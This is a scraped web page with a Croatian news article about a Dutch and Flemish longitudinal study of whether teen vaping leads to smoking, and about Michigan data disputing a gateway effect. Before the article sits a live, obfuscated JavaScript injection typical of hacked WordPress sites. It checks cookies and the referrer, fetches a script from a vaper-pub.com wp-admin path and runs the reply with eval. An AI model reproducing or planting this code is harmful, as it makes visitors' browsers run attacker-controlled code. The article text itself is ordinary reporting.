;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Nizozemska studija istražuje hipotezu o putu od vapinga do pušenja

S obzirom na broj izvješća u kojima se tvrdi da korištenje e-cigareta djeluje kao ulaz u buduće pušenje cigareta, sadašnja studija imala je za cilj utvrditi bilo kakvu takvu povezanost među tinejdžerima u Nizozemskoj i Flandriji.

Studija je pod naslovom “Istraživanje hipoteze o putu od e-cigareta do duhana: prospektivna studija replikacije među adolescentima u Nizozemskoj i Flandriji” objavljena u BMJ-u.

Longitudinalna studija sastojala se od 2839 na početku, 1276 nakon šest mjeseci i 1025 nakon dvanaest mjeseci. “Analize su uključivale (1) povezanost osnovne upotrebe e-cigareta i naknadnog pušenja duhana među nikad-pušačima; (2) povezanost učestalosti korištenja e-cigareta na početku i učestalosti pušenja duhana nakon praćenja; i (3) povezanost osnovnog pušenja duhana i naknadne upotrebe e-cigareta među ne-korisnicima e-cigareta”, izvijestili su istraživači.

Iz prikupljenih podataka, istraživači su zaključili da je odnos između vapinga i pušenja bio dvosmjeran. “Češća upotreba e-cigareta na početku bila je povezana s češćim pušenjem u naknadnim kontrolama. Osnovno pušenje duhana bilo je povezano s naknadnom upotrebom e-cigareta.”

Objašnjena je veza između vapinga i pušenja

U međuvremenu, nekoliko drugih studija koje se bave ovim odnosom pronašlo je objašnjenje za ovu povezanost. Nedavna studija maturanata u SAD-u pokazala je da tinejdžeri koji žude za uzbuđenjem i skloni su eksperimentiranju imaju veću vjerojatnost da će koristiti više zabranjenih supstanci, uključujući duhan i/ili proizvode za vaping.

Štoviše, istraživački tim sa Sveučilišta Michigan analizirajući nacionalne podatke o upotrebi duhanskih proizvoda među učenicima 8., 10. i 12. razreda, od 1991. do 2019., zaključio je da “gateway teorija” prema kojoj su e-cigarete ono što otvara put ka pušenju cigareta nema osnova. Prikupljeni podaci pokazuju da je dnevna stopa pušenja među dječacima iz 12. razreda rasla za 4,9% godišnje između 1991. i 1998., ali je pala za 8% godišnje između 1998. i 2006., te za 1,6% od 2006. do 2012. godine.

Štoviše, zabilježen je godišnji pad pušenja od 17% između 2012. i 2019. Ovaj pozitivan obrazac bio je dosljedan među dječacima i djevojčicama u svim razredima i za crne i bijele tinejdžere, što odgovara porastu stopa pušenja među istim dobnim skupinama.

Autor studije Rafael Meza naglasio je da s obzirom na ove podatke nema naznaka gateway efekta. “Stoga, mislim da je dobra vijest da brzo povećanje upotrebe e-cigareta još nije rezultiralo preokretom opadajućih trendova pušenja cigareta i upotrebe bezdimnog duhana, a ako ništa drugo, ti su se trendovi ubrzali.”

Choose your Reaction!
Leave a Comment